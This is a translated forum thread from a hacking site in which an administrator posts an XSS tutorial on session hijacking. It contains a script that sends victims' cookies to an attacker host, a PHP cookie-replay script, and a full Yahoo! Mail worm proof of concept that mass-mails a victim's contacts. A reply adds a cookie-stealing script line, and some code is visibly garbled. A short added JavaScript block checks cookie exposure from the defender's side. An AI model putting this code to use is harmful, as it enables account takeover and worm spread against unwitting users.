www.Hacking-Romania.com
Hack Tutorials RO / XSS impersonation attack
948Y-H4(K3R
☻ADM!N☻

Registered: 16 years ago
Posts: 2716
PART 1: Description

Using Cross-Site Scripting (XSS) attacks, it becomes possible to impersonate a legitimate
user (the victim) who is authenticated on a website (the target).

In this document we will assume that the target site has an XSS vulnerability
that allows an attacker to inject malicious code into a page.


This is the sequence of steps involved in this type of attack:


1. The victim authenticates on the target site
2. The attacker sends the victim a link to a page (containing malicious code) on the target site
3. The victim navigates to the page
4. The code contained in that page loads a script from another location, sending the victim's cookie to it
5. The script uses this cookie, posing as the victim on the target site


Example:

We assume the victim is already authenticated on the target site.

The target has an XSS vulnerability of the form

The attacker sends the victim the link
"http://www.tinta.com/pagina.php?var="

When the victim follows the link, the script "js.js" is loaded and executed by the victim's browser.

===== js.js =====

new Image().src='http://www.atacator.com/php.php?cookie= '+escape(documentˇcookie);

=================

The file "js.js" contains code that makes a request to the file "php.php", which is also
controlled by the attacker.

===== php.php =====


$domain=".target.com"; // cookie domain

$cookie=$_GET['cookie'];

// create the cookie file, assuming the session cookie has several "name=value; " sequences

$hcook=fopen("cookie.txt","w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value=substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// make any curl request using "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR

?>

The file "php.php" is the essence of this type of attack.
It takes the victim's cookie and uses it so that it can pass itself off as the victim
on the target site.
The reason for using a PHP script instead of a JavaScript one is that in this way
we can get past JavaScript's same-origin policy, being able to
make requests to ANY domain where the cookie is valid.
Moreover, we can receive data from and send data to the target site, manipulating it in any way.



>>PART 2: Yahoo! Mail worm PoC

We assume that Yahoo! has an XSS vulnerability of the form "http://xxx.yahoo.com/pagina?var="

1. The attacker sends the victim an email containing a link to
2. The victim follows the link
3. The file "worm.php" steals the victim's cookie and, using it, sends an email
to everyone in the victim's Address Book
4. The people in the Address Book become victims in turn when they follow the link
in the email sent by the worm, which apparently comes from the victim


===== worm.php =====


$subject="Link pentru tine"; // message subject
$message ="Uite un link cool: click me"; // message body

// we remove the need for a "js.js" file by checking the value of the "cookie" parameter
// if it does not exist we print the contents of the "js.js" file
// and if it exists we continue with the "php.php" code

if(!isset($_GET['cookie']))
{
$scripturl="http://".$HTTP_HOST.$REQUEST_URI;
print("new Image().src='".$scripturl."?cookie='+escape(documentˇcookie);");
}
else
{
$cookie=$_GET['cookie'];

// we create a unique file name in which to save the cookie, thus making sure
// that when several victims access the script simultaneously their cookies
// do not get mixed up
$cookiefile=rand(100,999).".txt";


// create the cookie file

$hcook=fopen($cookiefile,"w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value= substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// we load the Yahoo! address book to extract the contact data and build a variable
// of the form " , , etc..", and also to find the
// us.fXXX.mail.yahoo.com domain, which changes at every authentication


$address=curl("http://address.mail.yahoo.com/","",$cookiefile);
if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly
{
$apage=explode(" ",$address);
foreach($apage as $line_num => $aline)
{
if(strstr($aline,"ymsgr:sendIM"))
{
$ex =explode("?",$aline);
$ex2=explode(""",$ex[1]);
$id=$ex2[0];
$to=$to.$ex2[0]."@yahoo.com,";
}
if(strstr($aline,"Compose"))
{
$ex3=explode("/",$aline);
$domain="http://".$ex3[2];
}
}
}

// we load the "Compose" form located on us.fXXX.mail.yahoo.com to find the action of the email
// sending form and the value of the ".crumb" parameter, which we need in order to send the messages


if(strlen($to)>0 && strlen($domain)>0) // if we have both variables
{
$compose= curl($domain."/ym/Compose?","",$cookiefile);
if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly
{
$cpage=explode(" ",$compose);
foreach($cpage as $line_num => $cline)
{
if(strstr($cline,"form name="Compose""))
{
$ex4=explode(""",$cline);
$action=$ex4[5];
}
if(strstr($cline,".crumb"))
{
$ex6=explode(""",$cline);
$crumb=$ex6[3];
}
}
}

if(strlen($action)>0 && strlen($crumb)>0) // if we have both variables
{

$subject=str_replace(" ","+",$subject);
$message=str_replace(" ","+",$message);

// build POSTFIELDS for curl

$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";
$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&";
$post.="box=&.crumb=".$crumb."&";
$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&";
$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&";
$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&";
$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&";
$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";
$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";
$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";
$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&";
$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&";
$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&";
$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";

// send the emails
$mail=curl($domain.$action,$post,$cookiefile);

}
}
unlink($cookiefile);
}

function curl($url,$post='',$cookiefile) // helper function to simplify curl requests
{
$rand=rand(100000,400000);
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
if($post!=='')
{
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);
curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$result=curl_exec($ch);
curl_close($ch);
if($result=="") { curl($url,$post); } else { return $result; }
}

?>

===================

The impact of this type of worm can be huge, given that the email message sent by the worm
appears to come from a person the victim knows and trusts.


posted 15 years ago
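
Added example, not part of the original post: a defender-side check of which session cookies the `document.cookie` read in step 4 could reach, covering both the HttpOnly flag and the Domain scoping that Part 2 relies on (a script on one subdomain reading a cookie that is valid on another). All host names and header values are constructed, and Path matching is ignored (Path=/ is assumed).

```javascript
// Added example: which cookies can page script on a given host read?
// Hosts and Set-Cookie values below are constructed samples.

// Parse one Set-Cookie header value, keeping the attributes that matter here.
function parseSetCookie(header, setByHost) {
  const [pair, ...attrs] = header.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: false,
    domain: null, // null means a host-only cookie
    setByHost: setByHost.toLowerCase(),
  };
  for (const attr of attrs) {
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? '' : attr.slice(i + 1).trim();
    if (key === 'httponly') cookie.httpOnly = true;
    if (key === 'domain' && val) cookie.domain = val.replace(/^\./, '').toLowerCase();
  }
  return cookie;
}

// True if script running on pageHost would see the cookie in document.cookie.
function readableByScriptOn(cookie, pageHost) {
  if (cookie.httpOnly) return false; // never exposed to script
  const host = pageHost.toLowerCase();
  if (cookie.domain === null) return host === cookie.setByHost;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// For each header, list the hosts on which an injected script could read it.
function exposureReport(headers, setByHost, pageHosts) {
  return headers.map(h => {
    const c = parseSetCookie(h, setByHost);
    return { name: c.name, exposedOn: pageHosts.filter(p => readableByScriptOn(c, p)) };
  });
}

const HOSTS = ['mail.example.test', 'promo.example.test'];
const REPORT = exposureReport([
  'SID=constructed; Path=/; Domain=.example.test',           // weak: every subdomain
  'SID2=constructed; Path=/',                                // host-only
  'SID3=constructed; Path=/; Domain=.example.test; HttpOnly' // hardened
], 'mail.example.test', HOSTS);
console.log(JSON.stringify(REPORT, null, 2));
```

A session cookie that comes back with an empty `exposedOn` list cannot be collected by the injected script at all; a host-only cookie limits the exposure to XSS on the issuing host itself.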
   
wildchild
Moderator

Registered: 15 years ago
Posts: 223
These are actually several applications in one. Brilliant.

_______________________________________
deceased

posted 15 years ago
   
danuhack
SPECIAL MEMBER

From: '"test
Registered: 15 years ago
Posts: 447
A web vulnerability is not necessary; you send the victim an HTML email <script>document.location("http://sittutau.com/stealcookie.php"</script> and it will make the request when they open the email


"Let's say Yahoo has an XSS vulnerability"
I don't think you'll see such a thing

Edited by danuhack (13 years ago)



posted 13 years ago
   